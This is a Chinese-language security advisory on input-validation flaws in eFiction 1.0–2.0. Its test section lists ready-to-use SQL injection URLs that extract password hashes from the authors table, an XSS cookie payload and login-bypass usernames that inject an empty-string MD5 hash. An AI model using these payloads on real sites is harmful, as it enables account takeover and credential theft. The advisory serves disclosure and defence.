安全研究
安全漏洞
eFiction多个远程输入验证漏洞
发布日期:2005-11-26
更新日期:2005-11-26
受影响系统:
eFiction eFiction 2.0描述:
eFiction eFiction 1.1
eFiction eFiction 1.0
BUGTRAQ ID: 15568
CVE(CAN) ID: CVE-2005-4171,CVE-2005-4169,CVE-2005-4170
eFiction是一款基于Web的远程协同写作的工具。
eFiction处理用户请求时存在多个输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令或执行SQL注入攻击。
eFiction的文件上传模块在处理上传文件时没能正确检查文件的扩展名,远程攻击者可以上传php后缀的可执行代码,从而使攻击者可以执行任意指令。
eFiction的authors.php、viewstory.php、viewuser.php脚本没有对用户提交的参数数据做充分的检测过滤,攻击者可以通过在输入数据中插入特定的SQL代码非授权操作数据库。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://www.example.com/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/
http://www.example.com/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/&offset=0,40/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/
http://www.example.com/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/
http://www.example.com/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/
http://www.example.com/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/
username: 'UNION SELECT
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM
fanfiction_authors where level=1/*
password: [nothing]
username: 'UNION SELECT
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories
FROM fanfiction_authors where level=1/*
password: [nothing]
username: 'UNION SELECT
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent
FROM fanfiction_authors where level=1/*
password: [nothing]
建议:
厂商补丁:
eFiction
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.efiction.wallflowergirl.com/index.php
浏览次数:2397
严重程度:0(网友投票)
绿盟科技给您安全的保障